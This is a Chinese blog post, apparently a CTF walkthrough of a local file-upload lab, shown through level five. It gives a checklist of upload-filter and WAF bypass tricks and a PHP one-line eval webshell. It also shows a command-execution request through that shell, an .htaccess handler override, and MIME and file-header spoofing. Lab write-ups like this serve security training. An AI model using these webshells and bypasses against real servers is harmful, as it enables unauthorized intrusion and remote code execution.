<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>GGCTF-UPLOAD 通关记录 | 离沫凌天๓</title><meta name="keywords" content="Upload,Vulnerability,Docker,CTF"><meta name="author" content="离沫凌天๓"><meta name="copyright" content="离沫凌天๓"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><meta name="description" content="前言在 11月打 HW 的时候，遇到了一个靶标服务器二次渲染的文件上传点，因为之前没仔细研究没能拿到权限，还是有点遗憾的。而且 Getshell 的主要两个方式就是文件上传和远程命令执行，所以正好借着这个国光的文件上传靶场来总结一下文件上传的姿势。  手册12345678910111213141516171819202122232425262728293031323334353637383940#">
<meta property="og:type" content="article">
<meta property="og:title" content="GGCTF-UPLOAD 通关记录">
<meta property="og:url" content="https://www.lintstar.top/2020/12/612c8edf.html">
<meta property="og:site_name" content="离沫凌天๓">
<meta property="og:description" content="前言在 11月打 HW 的时候，遇到了一个靶标服务器二次渲染的文件上传点，因为之前没仔细研究没能拿到权限，还是有点遗憾的。而且 Getshell 的主要两个方式就是文件上传和远程命令执行，所以正好借着这个国光的文件上传靶场来总结一下文件上传的姿势。  手册12345678910111213141516171819202122232425262728293031323334353637383940#">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img.lintstar.top/hexo/20201204184628.webp">
<meta property="article:published_time" content="2020-12-04T09:35:22.000Z">
<meta property="article:modified_time" content="2023-11-09T07:40:38.119Z">
<meta property="article:author" content="离沫凌天๓">
<meta property="article:tag" content="Upload">
<meta property="article:tag" content="Vulnerability">
<meta property="article:tag" content="Docker">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img.lintstar.top/hexo/20201204184628.webp"><link rel="shortcut icon" href="/plogo/favicon-32x32.png"><link rel="canonical" href="https://www.lintstar.top/2020/12/612c8edf"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/node-snackbar/dist/snackbar.min.css" media="print" onload="this.media='all'"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容：${query}"}},
  translate: {"defaultEncoding":2,"translateDelay":0,"msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"簡"},
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: true,
    post: false
  },
  runtime: '天',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: {"chs_to_cht":"你已切换为繁体","cht_to_chs":"你已切换为简体","day_to_night":"你已切换为深色模式","night_to_day":"你已切换为浅色模式","bgLight":"#49b1f5","bgDark":"#121212","position":"top-right"},
  source: {
    jQuery: 'https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js',
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
    },
    fancybox: {
      js: 'https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js',
      css: 'https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: true,
  isanchor: true
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}

// https://stackoverflow.com/questions/16839698/jquery-getscript-alternative-in-native-javascript
const getScript = url => new Promise((resolve, reject) => {
  const script = document.createElement('script')
  script.src = url
  script.async = true
  script.onerror = reject
  script.onload = script.onreadystatechange = function() {
    const loadState = this.readyState
    if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
    script.onload = script.onreadystatechange = null
    resolve()
  }
  document.head.appendChild(script)
})</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2023-11-09 15:40:38'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(function () {  window.activateDarkMode = function () {
    document.documentElement.setAttribute('data-theme', 'dark')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
    }
  }
  window.activateLightMode = function () {
    document.documentElement.setAttribute('data-theme', 'light')
   if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
    }
  }
  const autoChangeMode = 'false'
  const t = saveToLocal.get('theme')
  if (autoChangeMode === '1') {
    const isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
    const isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
    const isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
    const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified
    if (t === undefined) {
      if (isLightMode) activateLightMode()
      else if (isDarkMode) activateDarkMode()
      else if (isNotSpecified || hasNoSupport) {
        const now = new Date()
        const hour = now.getHours()
        const isNight = hour <= 6 || hour >= 18
        isNight ? activateDarkMode() : activateLightMode()
      }
      window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
        if (saveToLocal.get('theme') === undefined) {
          e.matches ? activateDarkMode() : activateLightMode()
        }
      })
    } else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else if (autoChangeMode === '2') {
    const now = new Date()
    const hour = now.getHours()
    const isNight = hour <= 6 || hour >= 18
    if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
    else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else {
    if (t === 'dark') activateDarkMode()
    else if (t === 'light') activateLightMode()
  }const asideStatus = saveToLocal.get('aside-status')
if (asideStatus !== undefined) {
   if (asideStatus === 'hide') {
     document.documentElement.classList.add('hide-aside')
   } else {
     document.documentElement.classList.remove('hide-aside')
   }
}})()</script><meta name="referrer" content="no-referrer-when-downgrade" /><meta name="referrer" content="no-referrer"/><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="离沫凌天๓" type="application/atom+xml">
</head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="author-avatar"><img class="avatar-img" data-lazy-src="/plogo/Alogo.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data"><div class="data-item is-center"><div class="data-item-link"><a href="/archives/"><div class="headline">文章</div><div class="length-num">26</div></a></div></div><div class="data-item is-center"><div class="data-item-link"><a href="/tags/"><div class="headline">标签</div><div class="length-num">44</div></a></div></div><div class="data-item is-center"><div class="data-item-link"><a href="/categories/"><div class="headline">分类</div><div class="length-num">6</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw far fa-calendar-alt"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><i class="fa-fw fas fa-tools"></i><span> 工具</span><i class="fas fa-chevron-down expand"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/shell-java/"><i class="fa-fw fas fa-rocket"></i><span> Shell 编码</span></a></li><li><a class="site-page" href="https://www.lintstar.top/tools/Reverse-shell.html"><i class="fa-fw fas fa-terminal"></i><span> 反弹 Shell</span></a></li><li><a class="site-page" href="/hw/"><i class="fa-fw fas fa-shield-alt"></i><span> HW 小工具</span></a></li><li><a class="site-page" href="https://www.lintstar.top/tools/Avsearch.html"><i class="fa-fw fas fa-biohazard"></i><span> AV Search</span></a></li><li><a class="site-page" href="https://www.lintstar.top/tools/Windows-log.html"><i class="fa-fw fab fa-windows"></i><span> Events Log</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><i class="fa-fw fas fa-crown"></i><span> JAY</span><i class="fas fa-chevron-down expand"></i></a><ul class="menus_item_child"><li><a class="site-page" target="_blank" rel="noopener" href="https://sec.lintstar.top"><i class="fa-fw fas fa-star-of-david"></i><span> 凌星阁</span></a></li></ul></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url(https://img.lintstar.top/hexo/20201204184628.webp)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">离沫凌天๓</a></span><div id="menus"><div id="search-button"><a class="site-page social-icon search"><i class="fas fa-search fa-fw"></i><span> 搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw far fa-calendar-alt"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><i class="fa-fw fas fa-tools"></i><span> 工具</span><i class="fas fa-chevron-down expand"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/shell-java/"><i class="fa-fw fas fa-rocket"></i><span> Shell 编码</span></a></li><li><a class="site-page" href="https://www.lintstar.top/tools/Reverse-shell.html"><i class="fa-fw fas fa-terminal"></i><span> 反弹 Shell</span></a></li><li><a class="site-page" href="/hw/"><i class="fa-fw fas fa-shield-alt"></i><span> HW 小工具</span></a></li><li><a class="site-page" href="https://www.lintstar.top/tools/Avsearch.html"><i class="fa-fw fas fa-biohazard"></i><span> AV Search</span></a></li><li><a class="site-page" href="https://www.lintstar.top/tools/Windows-log.html"><i class="fa-fw fab fa-windows"></i><span> Events Log</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><i class="fa-fw fas fa-crown"></i><span> JAY</span><i class="fas fa-chevron-down expand"></i></a><ul class="menus_item_child"><li><a class="site-page" target="_blank" rel="noopener" href="https://sec.lintstar.top"><i class="fa-fw fas fa-star-of-david"></i><span> 凌星阁</span></a></li></ul></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">GGCTF-UPLOAD 通关记录</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2020-12-04T09:35:22.000Z" title="发表于 2020-12-04 17:35:22">2020-12-04</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2023-11-09T07:40:38.119Z" title="更新于 2023-11-09 15:40:38">2023-11-09</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/Note/">Note</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">5.9k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>23分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>在 11月打 HW 的时候，遇到了一个靶标服务器二次渲染的文件上传点，因为之前没仔细研究没能拿到权限，还是有点遗憾的。而且 Getshell 的主要两个方式就是文件上传和远程命令执行，所以正好借着这个国光的文件上传靶场来总结一下文件上传的姿势。</p>
<hr>
<h1 id="手册"><a href="#手册" class="headerlink" title="手册"></a>手册</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># PHP</span></span><br><span class="line"><span class="number">1.</span>遇到上传点传 php 失败</span><br><span class="line"><span class="number">2.</span>传php2,php3看下是黑名单还是白名单</span><br><span class="line"><span class="number">3.</span>走一遍正常逻辑传 jpg 看下上传模块是否正常，节约时间</span><br><span class="line"></span><br><span class="line"><span class="comment"># Jsp</span></span><br><span class="line"><span class="number">1.</span>正常流程走一遍</span><br><span class="line"><span class="number">2.</span>判断黑白名单</span><br><span class="line"><span class="number">3.</span>Asp,aSp,aaspsp</span><br><span class="line"><span class="number">4.</span><span class="keyword">as</span></span><br><span class="line">  p</span><br><span class="line">  asp空格</span><br><span class="line">  asp%<span class="number">00</span></span><br><span class="line">  asp%<span class="number">0</span>a</span><br><span class="line"><span class="number">5.</span>可以在这 .①a②s③p④ 这四个位置进行 fuzz ！！！很重要</span><br><span class="line"><span class="number">6.</span>.aspx , .cer , .cdx , .asmx , ascx试一下</span><br><span class="line"><span class="number">7.16</span>进制编码</span><br><span class="line"></span><br><span class="line"><span class="comment"># Tips</span></span><br><span class="line">要看 POST 包我们什么东西可控</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 绕waf</span></span><br><span class="line">- 垃圾数据填充				（WAF为了保证速度，可能只会检测包的前<span class="number">1</span>M）</span><br><span class="line">- 设置多个filename字段			（早期版本安全狗缺陷）</span><br><span class="line">- 更换filename字段位置			（早期版本安全狗缺陷）</span><br><span class="line">- 替换为GET包				（部分WAF只检测POST包中的参数）</span><br><span class="line">- 删除实体里面的Conten-Type字段			（某些WAF检测不到该字段就直接放行）</span><br><span class="line">- 删除Conten-Type中“C”后面的字符串，再加上脚本的后缀	（WAF规则缺陷）</span><br><span class="line">- 删除Content-Disposition字段里的空格		（WAF规则缺陷）</span><br><span class="line">- 修改Content-Disposition字段值的大小写		（WAF规则缺陷</span><br><span class="line">- Boundary后面加个空格或者其他可被正常处理的字符	（WAF规则缺陷）</span><br><span class="line">- Boundary边界修改为不一致			（两段Boundary不一致使得waf认为这段数据是无意义的，但容器并可能并没有这么严格）</span><br><span class="line">- 在文件名处换行				（WAF规则缺陷）</span><br><span class="line">- 使用多个Content-Disposition			（在IIS的环境下，上传文件时如果存在多个Content-Disposition的话，IIS会取第一个Content-Disposition中的值作为接收参数，而如果waf只是取最后一个的话便会被绕过）</span><br><span class="line">- 利用NTFS ADS特性				（NTFS是Windows常用的文件系统格式。该格式支持交换数据流（Alternate Data Streams，缩写ADS）特性。该特性可以让多个文件流使用同一个文件名，便于系统管理和使用文件。这样，一个文件名可以包含一个主文件流和多个非主文件流。其中，主文件流可以以文件名直接访问，而其他文件流需要以“文件名:文件流名”进行访问。例如“Test.php::$DATA”可以直接生成Webshell“Test.php”绕过黑名单，当然若waf对filename匹配不当的话也可能会导致绕过。并且对于这类文件，普通的文件管理器只能看到主文件流，而无法看到其余的文件流，因此可以把一个或者多个文件隐藏到另外一个文件中。）</span><br><span class="line">- 后缀名后加“.”				（Windows特性，存储时会删除“.”）</span><br><span class="line">- 超长后缀绕过后端重命名			（若后端程序对上传的文件除后缀部分重命名，构造很多”.”、“-”等符号有可能不被waf拦截）</span><br><span class="line">- 超长文件名				（文件名使用中文、特殊符号并最大程度的拉长）</span><br><span class="line">- 文件名结尾加“\”				（安恒某版本云waf规则缺陷）</span><br></pre></td></tr></table></figure>



<h1 id="搭建环境"><a href="#搭建环境" class="headerlink" title="搭建环境"></a>搭建环境</h1><ol>
<li><p>靶场 Github 地址：<a target="_blank" rel="noopener" href="https://github.com/sqlsec/upload-labs-docker">https://github.com/sqlsec/upload-labs-docker</a> 下载到本地</p>
</li>
<li><p>进入项目文件夹：<code>cd upload-labs-docker</code></p>
</li>
<li><p>部署运行：<code>docker-compose up -d</code></p>
</li>
<li><p>准备一个一句话木马 <code>x.php</code>：</p>
</li>
</ol>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>($_REQUEST[x]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>GET 和 POST 请求都可以用</p>
</blockquote>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201201145034.png" alt="image-20201201145028373"></p>
<p>一切准备就绪 ~</p>
<p>那就访问：<a target="_blank" rel="noopener" href="http://127.0.0.1:30001/">http://127.0.0.1:30001/</a> 开始第一关吧</p>
<blockquote>
<p>30001 - 30013 一个端口一关</p>
</blockquote>
<hr>
<h1 id="30001-JavaScript-绕过"><a href="#30001-JavaScript-绕过" class="headerlink" title="30001 -  JavaScript 绕过"></a>30001 -  JavaScript 绕过</h1><p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201201225410.png" alt="image-20201201225410069"></p>
<h2 id="本关特征"><a href="#本关特征" class="headerlink" title="本关特征"></a>本关特征</h2><p>抓不到数据包的情况下，依然提示文件类型不正确</p>
<h2 id="Bypass"><a href="#Bypass" class="headerlink" title="Bypass"></a>Bypass</h2><p>本关客户端 js 校验代码：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkfilesuffix</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">var</span> file=<span class="built_in">document</span>.getElementsByName(<span class="string">&#x27;file&#x27;</span>)[<span class="number">0</span>][<span class="string">&#x27;value&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(file==<span class="string">&quot;&quot;</span>||file==<span class="literal">null</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        swal(<span class="string">&quot;请添加上传文件&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;error&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">var</span> whitelist=<span class="keyword">new</span> <span class="built_in">Array</span>(<span class="string">&quot;.jpg&quot;</span>,<span class="string">&quot;.png&quot;</span>,<span class="string">&quot;.gif&quot;</span>,<span class="string">&quot;.jpeg&quot;</span>);</span><br><span class="line">        <span class="keyword">var</span> file_suffix=file.substring(file.lastIndexOf(<span class="string">&quot;.&quot;</span>));</span><br><span class="line">        <span class="keyword">if</span>(whitelist.indexOf(file_suffix) == <span class="number">-1</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            swal(<span class="string">&quot;只允许上传图片类型的文件!&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;error&quot;</span>);</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">error</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    swal(<span class="string">&quot;上传失败&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;error&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<h3 id="调试-js"><a href="#调试-js" class="headerlink" title="调试 js"></a>调试 js</h3><p>选到 whitelist 函数这行 开始调试 js：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201201221714.png" alt="image-20201201221714385"></p>
<p>找到该变量 直接修改数组元素的值</p>
<blockquote>
<p>右边为单点调试 左边为结束调试</p>
</blockquote>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201201225244.png" alt="image-20201201225244217"></p>
<p>结束调试 成功上传：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201201225614.png" alt="image-20201201225614946"></p>
<p>访问<code>http://127.0.0.1:30001/upload/1.php?x=system(%27cat%20/flag%27);</code>拿到 flag</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201201231229.png" alt="image-20201201231229255"></p>
<h3 id="禁用-js"><a href="#禁用-js" class="headerlink" title="禁用 js"></a>禁用 js</h3><p> 设置地址：chrome://settings/content/javascript</p>
<h3 id="抓包"><a href="#抓包" class="headerlink" title="抓包"></a>抓包</h3><p>可以先上传通过客户端校验后缀的文件  再通过抓包修改后缀绕过：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201201230942.png" alt="image-20201201230942710"></p>
<hr>
<h1 id="30002-htaccess-解析规则绕过"><a href="#30002-htaccess-解析规则绕过" class="headerlink" title="30002 - htaccess 解析规则绕过"></a>30002 - htaccess 解析规则绕过</h1><p>htaccess 文件是 Apache 服务器中的一个配置文件，它负责相关目录下的网页配置。通过 htaccess 文件，可以帮我们实现：网页301重定向、自定义 404 错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。</p>
<blockquote>
<p>.htaccess文件最常用的功能应该就是自定义404页面了，其操作也非常简单，在.htaccess 文件中加入代码：ErrorDocument 404 /Error.html ，然后建立一个简单的html404页面并命名 Error.html即可。</p>
</blockquote>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201201233125.png" alt="image-20201201233125066"></p>
<h2 id="本关特征-1"><a href="#本关特征-1" class="headerlink" title="本关特征"></a>本关特征</h2><p>黑名单几乎过滤了所有有问题的后缀名，除了.htaccess</p>
<h2 id="Bypass-1"><a href="#Bypass-1" class="headerlink" title="Bypass"></a>Bypass</h2><p>上传一个允许的后缀文件 抓包修改文件名和内容：</p>
<ul>
<li>文件名：<code>.htaccess</code></li>
<li>内容：<code>SetHandler application/x-httpd-php</code></li>
</ul>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201201234742.png" alt="image-20201201234742067"></p>
<p>这里的 htaccess 文件会使服务器把我们上传的其他后缀文件当成 php 文件解析</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202094150.png" alt="image-20201202094150774"></p>
<p>此时服务器的目录：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201201235358.png" alt="image-20201201235358756"></p>
<hr>
<h1 id="30003-MIME-绕过"><a href="#30003-MIME-绕过" class="headerlink" title="30003 - MIME 绕过"></a>30003 - MIME 绕过</h1><p><strong>媒体类型</strong>（通常称为 <strong>Multipurpose Internet Mail Extensions</strong> 或 <strong>MIME</strong> 类型 ）是一种标准，用来表示文档、文件或字节流的性质和格式。</p>
<p>MIME的组成结构非常简单；由类型与子类型两个字符串中间用 ‘/‘ 分隔而组成。不允许空格存在。type 表示可以被分多个子类的独立类别。subtype 表示细分后的每个类型。</p>
<p><strong>通用的结构为：</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">type&#x2F;subtype</span><br></pre></td></tr></table></figure>

<p>MIME类型对大小写不敏感，但是传统写法都是小写。</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202093006.png" alt="image-20201202093006652"></p>
<h2 id="本关特征-2"><a href="#本关特征-2" class="headerlink" title="本关特征"></a>本关特征</h2><p>服务端校验 上传图片格式不解析 其他格式（包括 .htaccess）提示文件类型不正确</p>
<h2 id="Bypass-2"><a href="#Bypass-2" class="headerlink" title="Bypass"></a>Bypass</h2><p>抓包修改 Content-Type 字段：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202093507.png" alt="image-20201202093507077"></p>
<p>上传成功</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202094107.png" alt="image-20201202094107221"></p>
<hr>
<h1 id="30004-文件头绕过"><a href="#30004-文件头绕过" class="headerlink" title="30004 - 文件头绕过"></a>30004 - 文件头绕过</h1><p>常见的文件头标志如下：</p>
<ul>
<li>JPEG (jpg)，文件头：<code>FFD8FF</code></li>
<li>PNG (png)，文件头：<code>89504E47</code></li>
<li>GIF (gif)，文件头：<code>47494638</code></li>
<li>HTML (html)，文件头：<code>68746D6C3E</code></li>
<li>ZIP Archive (zip)，文件头：<code>504B0304</code></li>
<li>RAR Archive (rar)，文件头：<code>52617221</code></li>
<li>Adobe Acrobat (pdf)，文件头：<code>255044462D312E</code></li>
<li>MS Word/Excel (xls.or.doc)，文件头：<code>D0CF11E0</code></li>
</ul>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202095116.png" alt="image-20201202095116809"></p>
<h2 id="本关特征-3"><a href="#本关特征-3" class="headerlink" title="本关特征"></a>本关特征</h2><p>服务端白名单校验 只允许上传固定类型的文件 getReailFileType 函数只会校验文件前几个字节</p>
<h2 id="Bypass-3"><a href="#Bypass-3" class="headerlink" title="Bypass"></a>Bypass</h2><p>抓包添加文件头 GIF89a 假装自己是个 GIF 文件</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202100642.png" alt="image-20201202100642050"></p>
<p>成功上传</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202100521.png" alt="image-20201202100521776"></p>
<hr>
<h1 id="30005-双写绕过"><a href="#30005-双写绕过" class="headerlink" title="30005 - 双写绕过"></a>30005 - 双写绕过</h1><p>关键代码：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202101224.png" alt="image-20201202101224260"></p>
<h2 id="本关特征-4"><a href="#本关特征-4" class="headerlink" title="本关特征"></a>本关特征</h2><p>上传 php 文件后修改 MIME 类型伪造文件头成功上传</p>
<p>但是上传的结果是这个样子：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202101409.png" alt="image-20201202101409738"></p>
<p>上传的 php 文件后缀被替换了 导致服务器不解析</p>
<p>回过头来看正是这行代码造成的：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$name = str_ireplace($blacklist,<span class="string">&quot;&quot;</span>,$name);</span><br></pre></td></tr></table></figure>

<p><img src= "/img/loading.gif" data-lazy-src="https://img.lintstar.top/hexo/20201202101822.png" alt="image-20201202101822568"></p>
